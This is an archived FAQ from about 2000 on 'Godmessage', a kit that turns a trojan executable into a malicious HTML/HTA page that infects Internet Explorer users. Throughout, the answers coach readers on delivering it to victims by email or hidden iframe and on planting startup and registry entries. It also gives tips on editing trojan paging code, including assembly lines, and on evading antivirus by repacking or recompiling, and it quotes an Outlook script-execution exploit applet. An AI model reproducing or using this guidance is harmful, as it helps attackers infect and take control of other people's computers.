
                               
                                                             FAQ about the Godmessage

                                Taken from http://www.sotmesc.org/gcms/trojans/  (latest on top)


                                                              answers by The Pull 

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
It would be nice to be able to use it with bigger exe files 
(let's say around 380k

A
 No, the bigger file limitation is inherent in the code.
 I use ICQ paging trojans myself with them... really, I would just as well have asylum
 or tHing on there first as subseven or bo2k... BUT,
 a larger file size would mean I could run my own little devices. 

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
How to make .hta files ?

A
Change the extension of a file to .hta. 

Q
But the .hta files have a little header with 1071 bytes... I need informations about this header...
Check the KakWorm or Elva Worm ...

A
When it is made with the script lib bug it does.

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
Okay, that site, I took down on second thought after posting the address. It was too late for one poor guy. It didn't have the tHing in it.

313.exe has nothing to do with the godmessage.

Actually, you aren't in Europe, near Germany are you? 

A
Okay, that site, I took down on second thought after posting the address. It was too late for one poor guy. It didn't have the tHing in it.

313.exe has nothing to do with the godmessage.

Actually, you aren't in Europe, near Germany are you? 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------

Q
Hey, man, me and my other french pals cannot create a workable .hta file, we just can't read the html file created.:

Paths changed according to our OS's languages
tHing server 1.6
.vbs files correctly ran

It seems that it doesn't work for all of us.

sorry, if someone understand why...

A
You changed the path to your language? It may be... your Windows is France\French... not just France\English? There simply may be more things that need translating.

All I have... is a working German\English and German\German version. 

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
I've tried hexing the icq page subject and body of the asylum server and still I'm not getting any pages. I was going through slim's messageboard last night. Somebody looked at asylum in asm and claimed that the pager ip is wrong. I went to wwp.icq.com and sent myself 3 pages, all of which I recieved instaneously. I did however notice that each page was sent through a different ip. I appreciate your time.

A
I just hex edited the string sent to something random, because I know Mirabilis is pretty good at filtering stuff out.

Like, in a hex editor, change everything in the actual message sent to you. I suggest random gibberish. (Don't change the ICQ
number, heh, or the IP address).

Maybe the DNS changes... but I don't know about the IP changing, I think I just saw one IP in there. (I think this is the tHing updated too, but am not sure). 

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
I have a question. I'll admit that this is my first time installing a trojan. But I used godmessage with Asylum, and sent it to somebody, who replied and said that they read the web page. So all should be well, although my biggest question is this. Right after the reply from the victim, I got a second e-mail that right when I open it, it sets off my AV saying that I'm trying to download a infected file. So I click cancel. Now do I want to open this file, is it info I need to know? Does this always happen?
I'm just worried that I might somehow infect my own system with something. Thanks. 

A
Actually, while it is okay to test, I don't recommend anyone even do that.

He may have been sending you your own stuff back. 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
How do I REMOVE a Godmessage IV server from a local computer ? any help appricated. 

A
Depends on which version you ran. The regular one, you connect to port 7777 with the tHing client 1.6 -
http://cometo/soul4blade - and use the user name/pass combination given in the readme. (I forget right now)... maybe user fc , I know the pass is simply pass.  
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
Has anyone had success with any other trojan besides the Thing? 

A
I have been using Asylum in recent testings, and it is very good.

slim.slak.org 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------

Q
im having a problem when i change to another lenguaje

i change 
fn="..\\\\Start Menu\\\\Programs\\\\Startup\\\\EA.HTA"

to 

fn="..\\\\Menú Inicio\\\\Programas\\\\Inicio\\\\EA.HTA";

(spanish version)
it runs the onz.exe

but when is goin to introduce the command to the registry gets an error 

here
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\clean"

can some one helpme! 
what else do i have to change??? 

A
You might try looking in your registry for that registry path in spanish. 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
well godsmessage does not work for everyone 

A
At this stage, with this build, I don't have any other error complaints coming on. 
We have patiently tried to fix the various versions where it does not work... the only thing left is the language difference.

Right now, it seems the tHing MAY or MAY NOT be stalling on your system - IF you are using the latest build.

I don't know if you are or not. You also said you would stop making double posts, and you didn't do that.
So, how do I know what to believe?

If you have a valid problem, then fine. But, you need to try with another trojan before making multiple posts about the same thing just because the tHing is stalling on your system.

FRANKLY, the tHing is probably already running on your system, hence why it can not run again. 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------

Q
I finally got your last version of gm from angelfire and it does creat the html files,
what i wanted to know is why it does not delete the onz.exe it creats after runing the ea.hta file and
also i wanted to know which of the godmessage file that is created by the gmcreator.vbs am i suppose
to use to sent to my victims and also if u have time i would appreciated if u could tell me what the time
out r for and what they do and also how do u know its working cuz it does not seem to me i mean i used the thing server but then i could not connect to it when i tested it on my self.
thanx

A
Okay, you have to figure this crap out for yourself from here.

I don't have anything but warnings for people trying to victimize other people.

I don't mind if some kids use this, really, not the worst sin. But, I am not going to baby you so you can victimize innocent people at will.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
How do i take out the hide process function from the original code of the thing server!
what did you do?
i whant to know this because i want a server so it will run on NT/w2k ... but with ICQ notification!

A
I made this change, after figuring out what was the reason it wasn't running and where that was in the code and what this code
did. (It was only after this hellish work that I found the article on this bit of code where it says that this is not NT compatible).
Oh well, learned something.

Just change these lines to this (ie, put the semi-colons before these lines):->

;push offset Kernel32
;call GetModuleHandleA ; get the handle of kernel32.dll
;push offset RSP
;push eax
;call GetProcAddress ; get the address of the function
;mov ebx, eax ; save the pointer into ebx
;call GetCurrentProcessId ; get the current process's id
;push 1 ; 1 = Register as Service
;push eax ; process id
;call ebx ; call RegisterServiceProcess

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
Is it possible to infect people by hotmail, except the "adding a link" on the email, iframe seens not works on hotmail. If possible, please tell me how. 

A
Hotmail is different, like Yahoo, or whatever. You are viewing the email in there instead of in your browser. You can look into hotmail security circumventions by Guninski at www.guninski.com... that may create a popup, etc. 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
the only real problem is that it will not work on aol browsers and one third of the world uses that crap aol 

A
Hrrm. IE was the most used browser last I saw. 86% the statistics said on altavista news. Which makes sense to me... because on the spynet site which had a ton of hits, everyone had IE... on the newsgroups, I stroll up and down them all them time, everybody has IE.

What is the most popular version of AOL, and does anyone here use it? What error message does it give? Can you even view activex or javascript? Does it use Netscape as the base now, or IE?
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
The thing port# ??? from the godmessage? 

A
Like it says on the readme, port 7777 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
if i want to use a godmessage.html file in the body of my email ,is it enough for me just to cut the whole html file and then paste it in the body of my email ,or do u need some extra doing. 

A 
(by 6IT)
You can send the html as an attachment, but you can't use it as the body without modifications. It won't work. However George Guninski's exploit does mention a way to do it:

Regarding this issue and Outlook with "security update" (probably this
should be another advisory).
It is a bit more difficult to exploit this from Outlook because of the
"Outlook security
update" which stops "most scripting". It is common misbelief that the
"Outlook security update"
stops all scripting, but this is not true.
It is possible to trigger the execution of Active Script from email
message
with the help of Java.
Send a email message containing 
-----------javascript.html-------------

---------------------------------------
----------outlookjs.java---------------
import java.applet.Applet;
import netscape.javascript.*;
class outlookjs extends Applet {
public JSObject j;
public void init()
{
try {
j=(JSObject) JSObject.getWindow(this);
j.eval(getParameter("command"));
}
catch (Exception e) {System.out.println(e);};
}
}
--------------------------------------- 

     http://www.megasecurity.org/Info/guninski23.txt

A  (by The Pull)
I disagree, though this is good. This is for people who actually downloaded M$'s "fix" after the ILOVEYOU virus. I didn't do this, I don't think many people did do this. Why? Because it kills almost all scripting.

But, to be extra professional, yes, you would use this. Just don't sign up with the website it requires without a proxy or you have just made a tracable link back to yourself. 

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
"iframes refresh to a webpage", can please you ellaborate some more on this?

Q
But the .vbs how am i suppose to execute it i mean dosent the extention have to be .com or .exe to execute ,and what is
iframes,and please bare with me if i sound too dumb.

A
No, absolutely not does it have to be .exe or .com, and everyone needs to know this. .hta, in fact, doesn't even have an icon for it and looks like a bad file... but, is a well documented "HTML application" file type... for instance.

.vbs, .shs, .htt, .wsh, there are a lot of "bad file types" - that yes, are very much run when clicking on them. 

I have several copies of very powerful virii, like the ILOVEYOU virus that end in .vbs. There are very functional and useful programs that end in .vbs, as well. (Of course).

Just name your trojan onz.exe and put in the folder, then double click on the .vbs. It will prompt you for the trojan file... very simple stuff, and then automatically make the HTML.

Here's the iframe refresh that works well:->http://www.dynamicdrive.com/dynamicindex8/miniwindow.htm

Mess with that after you do some testing with your trojan and the godmessage. There are some versions going around that have typo's and such. I simply need to get a webpage.

Your trojan must be 24kb or less. Should be packed for just good anti-AV practice. If you have AV turn it off, because some AV catches some trojans even packed.

Er, actually test your trojan seperately first. Contain everything. Contain your tests. This contains your tests.

Then, try it.

Then, after you have a good working copy, use that script above. Put it in a blank HTML page, have the url to refresh pointing to your webpage. Make the size 0,0. Put some message in there, like a regular email. 

You need to know how to edit the HTML tags when sending the email. That is email client specific.

This is all the difficult but professional and sure way, mind.

You can always just cut and paste the source code into an email message, or simply put a link in there that is provocative.

Test you email on yourself, first.

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
hi there,i was wondring if someone could please tell me how i could use my own exe file in the html file and how can i put it in my email massage?

A
Double click on the vbs, choose onz.exe, and make your trojan. For email, use an iframes refresh to a webpage for best results. 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
ok i have tested god message iii and iv on win98 se (IE 5.0, stock that comes with win98 se),

iii : after rebooting as windows started screen blacked out

there was a on.hta created in windows\starm~1\programs\startup

rebooted again, same result so had to reboot to command promt and del the file

iv : after rebooting there was a ea.hta in above mentioned dir but no port listening
when i did netstat -an , well there was one but that was my ftp server on port 5000

So anyone actually got this to work?
Yes i did try that link listed below, it openened up a dozen or so IE windows, just held
down alt - f4 for about 10 secs and they all went away

A
There wouldn't be a file if you stopped before it could run.

Apparently, you are saying you tested both versions and the URL version (one of them). And, that all of these times your screen "blacked out", not letting you boot up, so you stopped the boot, and booted into safe mode deleting the file.

I have never heard of that happening before.

If you boot up in safe mode to delete the file, it is very likely that you did delete the file before it could run.

Otherwise, it takes about ten seconds to test. Just click on the file, then click on the HTA. Rebooting is optional. 


>>>ok i have tested god message iii and iv on win98 se (IE 5.0, stock that comes with win98 se),

iii : after rebooting as windows started screen blacked out

there was a on.hta created in windows\starm~1\programs\startup

rebooted again, same result so had to reboot to command promt and del the file<<< 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Godmessage IV Creator 0.3
Q
How to Update the tHing's ICQ Paging

A
Two things. You need to update the IP address. Ping wwp.icq.com. (I think it is, go to your communication center and look at the address). 
Second, you need to change the string being sent. Replace, neither add nor take away. 
That's it. 
Requires just a tiny bit of hacking. My friend who did this has ZERO programming experiance and did it entirely from a hex editor. (Easier to actually change the source and recompile, but whatever). 

Q
ok what do we change the string being sent to, what? and what is a good hex editor to use for this? 

A
here are a lot of hex editors, and this being your first time, you will spend about seven hours on it.

PSedit is very good, do a search on that. Hexworkshop, good, easy for first time. Hackman is tops. www.nonags.com has that.

As for strings being sent... change like the "o" to "0", make the word's into nonsense, whatever. Find the string being sent and just change all of the non-important words to zzzz or whatever.

What string? Go to your communication center on ICQ and send yourself a page message. Look at the URL. THAT is the string being sent which is in plain text in the binary file. (Basically).

Q
did you not know that there is a server editor ?
simply change password,icq........

A
Actually, the editor breaks when you change the code. Just like AV does. I changed the code a bit so it will run on w2k and NT systems. (What I run). 

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Godmessage IV Creator 0.3
Q
i like using mini command as an uploader, once it is compressed it is 27kb, my question is will godsmessage work with a compressed file? or do I just need to find something that small like a reworked version of thing? 

A
Compressed works fine, but the smallest right now is 24K.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Godmessage IV Creator 0.3

Q
OK.
I can't find the Guninski's notes about the activeX presence... In fact, technicaly, why is this applet here ? To load ActiveX
component on the system ? 
GM doesn't work for me. 
I do not change the html file (except for the paths line). Something is wrong. I spend all the night to find what...without any success !
Does I need to have some OS (on W98) options on ? All my java stuff is activated. 
It's weird, the oldest version of Godmess was working ; the .hta file was created on my startup dir.
In my Html app, I got one error msg : code=com.ms.activeX.ActivexComponent link possibly dead, but You said that it was normal, right ? 
Can I have explanation about this ? I mean technicaly ? 

A
Uhm, again, update first to GM4. 

Try without anyother trojan first. Just try with the vanilla server. Version 1 works locally, yeah, but put it on a website and no go. Fat security warning.

Here try this page http://surf.to/MeineHP

And, see if that puts a HTA in your startup directory. 

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
In EA.HTA, the last 5 witness.Run commands won't run for me unless I put them in a BAT file which is run via a witness.Run command from EA.HTA. Wouldn't it be better if you take as many commands as possible and trigger them form a BAT file?
Also, there is a bug in the last two witness.Run, you have an extra ' character . Also, GMCreator.vbs won't produce the HTML for me unless the 0 in WSHShell.Run "%comspec% /c xxencode.com onz.exe",0,True is changed to a 1.

A
Batch files are too much overhead. You need to deal with the latest revision of version four. Two lines were commented out - the extra ' - in one version for debugging.

>>>Also, GMCreator.vbs won't produce the HTML for me unless the 0 in WSHShell.Run "%comspec% /c xxencode.com onz.exe",0,True is changed to a 1.<<<

That switch has nothing to do with creating the HTML.

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Godmessage IV Creator 0.3
Q
It created EA.hta in startUp, when I restart the computer, everything goes well, it has created "xxdecode.src" "xxdecode.com"
"Onz.exe" "onz.xxe" in C:\windows, after a while, a error massage pop up, something like "error on line 13 " "system can't find the file",
and it didn't clean (delete) all those files has created in windows, and also the onz.exe didn't run. Please help me to make it works, thanks. 

A
You need to upgrade to version 4. 

And, yes, we already discovered comspec was needed on the debug line for some systems and put that into version four last week. 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
I have made a working version of godsmessage, which ships the EXE file in a direct way to the system. I doesn´t need lcoder.com anymore. it also doesn´t use VBScript 

A
It should be possible to do this, at least in someway because of this new exploit of Guninski's. (Or, because of Microsoft's gross negligence, which one I can not figure out).
I simply made this version rather quick, messing with the exploit now to try and make it run immediatly and use more deadly activex objects... like wsh, directly, from the webpage.

----------------------------------------------------------------------------------------------------------------------------------------
Godmessage IV Creator 0.3
Q
Just put your server.exe in the same dir and hit the .vbs file.
Your godmessage is created : godmessage.html
All is fine, (I changed the paths in my own country language) but I got an error :
com.ms.activex.ActivexComponentn can't be instantiated...
Do I miss some library ? an OCX or what.. ???

A
No, that is an error that you are supposed to get. If you want to know it WAS instantiated, but wasn't supposed to be able to.
Guninski commented on this on his original bug report. (Which everyone should read) 
----------------------------------------------------------------------------------------------------------------------------------------------
Godmessage IV Creator 0.3
Q
After a god msg script is created by inserting your executable what can you do with the created god msg script.
1 add it to an email?
2 send it as an attachment? (my choice)

what exactly do you do? the directions are not very clear. sorry but i have never used it before and decided to give a it a try.
thanks for your help. 

A
Attachment is the wrong choice. It can be in the body of your email. Best to use a DHTML refresh. (Then again, it may not matter with the new version, haven't tested fully).
-------------------------------------------------------------------------------------------------------------------------------------------------
Godmessage IV Creator 0.3.
Q
what about the new version that already has an html file? same thing? or is there any cut and paste shit? 
A
If there is a HTML file in there, it was just a leftover from testing. 
--------------------------------------------------------------------------------------------------------------------------------------------------
Godmessage and Thing.
Q
does anyone know if the thing still works cause i have my html file of godsmessage and i tested it on another computer and got nothing, what gives anyone know? 

A
that version works fine, and unlike the opinion of the other poster.. AV does not know of this trojan yet. How could they? I totally messed with the script and packed it.

Still you can use a lot of trojans for this now. Kuang is interesting. 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Godmessage and Thing.
Q
The Thing is detected.

A
The version released with Godmessage is new.
It would be impossible for them to have detected this before last Friday, and highly unlikely after then. 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Godmessagecreator 0.2.
Q
About that lhcoder, are we supposed to use that or does the vb script take care of that? 

A
The script takes care of it, don't worry about it.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Godmessage IV Creator 0.1
Q
since everybody is using diffrent languages of windows
they have diffrent startup maps, only people using and english copy of windows will have the dir

%windir%/start menu/startup

could everyone using a diffrent language post their startup dirs? thanks!

and another thing, why not make a javascript that detects the language of the os and then redirs the user to their language specialized godsmessage :)


A
According to a German tester .03 takes out this language problem. Otherwise, you still have to change it to your own start path.

The German/English version is .03 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Godmessage IV Creator 0.1
Q
Dutch : %windir%/start menu/opstarten

A
The latest revision takes care of this. 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Godmessage Creator IV 0.1
Q
To use trojans without icq notify, somebody could make a program that sends you a notify and can be binded to a server.
Nexus, the writer of the Ashley trojan claims that he wrote an icq notify in one line of code.
In that case the notifier has not be that big

A
Even in the tHing the ICQ paging is VERY simple. You just get a webpage. You know, in search engines, you can look at the URL and see your search in there? Same way ICQ's web paging works, and same way the tHing (and RICQ, for that matter, and etc, etc) work.

Your ICQ number, their info, etc, is all in the URL. ICQ's wwp.icq.com server parses it and sends it out. The strings just need to be changed in the tHing.

With the version of the tHing with these latest version of gm, my goal was quite simple. To have many people trojanize many systems. Kill server sometimes, by coincidence does not work very well. You sometimes have to do it, once, twice. And, if HTA is still there, it will be created and run again.

Regardless, we have code to kill the HTA, and actually I don't think we implemented this in even this last version... but we are working on the updates. It was an oversight.

As for AV, it might be possible that AVP works differently when scanning .exe's than any other company, because they are very fast to update. Otherwise, no this trojan does bypass AV.

How to pass AV: Very, very simple. Use one packer, when they get that, use another. But, there is another way, too. When you change the code and recompile, that passes AV, too. Even without it packed.

I first saw that even one line can do this with bo2k when I added the start process function for cDc at www.bo2k.de.

ICQ notification can be put into the tHing, you just need to find their new format, and ping the above address for the new IP address. I have not bothered yet.

We may allow larger trojans to be put into future revisions, however there is still the download factor. A 364kb webpage is something that takes sometime to parse into HTA and to load on slower connections.

Of course, these same rules about changing the code and recompilig hold true with all trojans we have the source code too. I have never had to worry about AV, because I make my own versions. You should, too. (Granted, I do often let people have my version, because otherwise it is a signature pointing to you).

|Project Mayhem|
---------------------------------------------------------------------------------------------------------------------------------------
Godmessage Creator 0.1
Q
chagng the source and recompiling will work
But unpacking it and repacking it will work for most AV except AVP cos they have their own unique unpacking system. No matter how u pack it, AVP will first unpack it internally then scan it.
One trick i use is to use PEcompact to trim it first then u pack it.then it'll be undetected. 

A
Oh... I always did find good AV stuff here. Well, I haven't been stupid then in recommending them for this past year and talking about how McAfee and Norton suck.

Their dojo is well air conditioned.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Godmessage Creator 0.1
Q
ok so you click on the vbs script and then type in the name of the exe file then it creates the html file and you would then upload this to say tripod.com or some other free webspace spot and you also upload the onz.exe also to the site? 

A
I haven't tested it yet, but from the specs I heard, it simply creates the HTML page.

Therefore, you just upload the HTML page to the website.

He is on the team, him and one other guy. I simply have had a lot of work-work to do this week. If anything, right now we are trying to get bo2k/subseven size trojans in there right now.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Godmessage Creator 0.1
Q
after a god msg script is created by inserting your executable what can you do with the created god msg script.
1 add it to an email?
2 send it as an attachment? (my choice)

what exactly do you do? the directions are not very clear. sorry but i have never used it before and decided to give a it a try.
thanks for your help. 

A
Probably best if you just use it for gags. Otherwise, you can put it in the body of your email... OR newspost... OR as a link to a webpage.

Attachment? NEVER. 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Godmessage Creator 0.1
Q
Ok, created the C:\Start Menu\Programs\Startup
path in my disk since it's in another language, ran godmessage with errors in the script and C:\Start Menu\Programs\Startup resulting empty. Using IE5.5. Error shown:

A Runtime Error has occured.
Do you wish to debug?

Line:0
Error description unavailable 

A
One thing that has always been true about the godmessage, is you need to change the path in the HTML to the path for your language version. For instance, on German/English systems... the path is autostart, instead of startup. 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
Have I to rename the paths in the html code for the Startup dir ? I mean, in my own country language ?

A
Yes, as always. 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Godmessage Creator 0.1
Q
One thing that's not clear is what short.com is for? Would you mind explaining? 

A
short.com is simply a .com (which, because of that, can be recreated by being sent into debug)... which creates lcoder.exe.

Read the first godmessage readme for more info.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
Q
OsionusX did it ??

A
OsioniusX is another name for myself, among many.

But, no, I didn't 6IT did. I simply didn't have time.

6 Inch Taint and StoneFisk were co-author's with me on version IV.

I did express to 6IT that people wanted ICQ notification as was heard on this list and elsewhere.
So your voices were heard. 
----------------------------------------------------------------------------------------------------

October 2000
M_R
http://MegaSecurity.org